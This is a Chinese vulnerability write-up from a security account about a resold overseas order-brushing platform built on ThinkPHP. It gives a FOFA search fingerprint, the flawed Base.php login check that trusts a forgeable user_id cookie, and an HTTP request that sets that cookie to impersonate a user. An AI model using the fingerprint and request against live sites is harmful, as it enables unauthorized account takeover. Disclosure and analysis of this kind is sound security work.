简单描述
源码简介: 二开版海外抢单Shua单系统/用户风险值/叠加组/打针/订单自动匹配系统,此套别人二开的海外抢单Shua单系统,新增用户风险值、最后做单时间,带三级分销,权限代理后台,充值提现优先完美后台查询功能
fofa
"/red/popper.min.js"
框架:ThinkPHP 5.1.41 Debug:True 默认后台:/admin/login
主要是美国用户多一些
漏洞分析
位于 /index/controller/Base.php 控制器的 __construct 方法作为验证登录控制器,来验证用户是否登录,然而这套系统实际采用两套验证用户的方法,Session和Cookie并存
其中 if (!$uid) { $uid = cookie('user_id'); } 这句话是关键,如果Session中没有发现user_id,那么直接验证Cookie中的user_id,而Cookie是可以伪造的,这里导致漏洞产生
/**
* 验证登录控制器
*/
class Base extends Controller
{
protected $rule = ['__token__' => 'token'];
protected $msg = ['__token__' => '无效token!'];
protected $_uid;
function __construct(App $app)
{
parent::__construct($app);
if (config('shop_status') == 0) exit();
$uid = session('user_id');
if (!$uid) {
$uid = cookie('user_id');
}
//echo App::VERSION;exit;
/*if (request()->subDomain() == 'cs' || request()->subDomain() == '') {
header('Location:' . 'https://www.' . \request()->rootDomain());
exit();
}*/
$controller = strtolower(\request()->controller());
if ($controller == 'user') return;
if (!$uid && request()->isPost()) {
$this->error(lang('no_login'));
}
if (!$uid) $this->redirect('User/login');
$this->_uid = $uid;
}
}
漏洞复现
Payload:
GET /index/index HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 73
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: user_id=1
Host: 127.0.0.1:81
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
User-Token-Csrf: csrf66e28d7ebbffa
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
来自星悦安全公众号